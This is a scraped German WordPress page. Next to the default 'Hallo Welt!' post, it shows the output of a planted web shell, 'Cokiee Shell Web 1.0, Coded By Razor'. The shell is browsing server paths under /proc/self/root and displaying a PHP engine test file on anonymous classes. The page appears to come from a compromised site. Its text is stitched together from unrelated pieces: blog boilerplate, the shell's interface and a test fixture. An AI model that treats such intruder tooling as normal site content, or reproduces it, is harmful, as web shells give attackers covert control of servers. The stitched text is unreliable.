Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/anon/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/Zend/tests/anon/003.phpt |
--TEST-- reusing anonymous classes --FILE-- <?php while (@$i++<10) { var_dump(new class($i) { public function __construct($i) { $this->i = $i; } }); } --EXPECTF-- object(class@%s)#1 (1) { ["i"]=> int(1) } object(class@%s)#1 (1) { ["i"]=> int(2) } object(class@%s)#1 (1) { ["i"]=> int(3) } object(class@%s)#1 (1) { ["i"]=> int(4) } object(class@%s)#1 (1) { ["i"]=> int(5) } object(class@%s)#1 (1) { ["i"]=> int(6) } object(class@%s)#1 (1) { ["i"]=> int(7) } object(class@%s)#1 (1) { ["i"]=> int(8) } object(class@%s)#1 (1) { ["i"]=> int(9) } object(class@%s)#1 (1) { ["i"]=> int(10) }
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare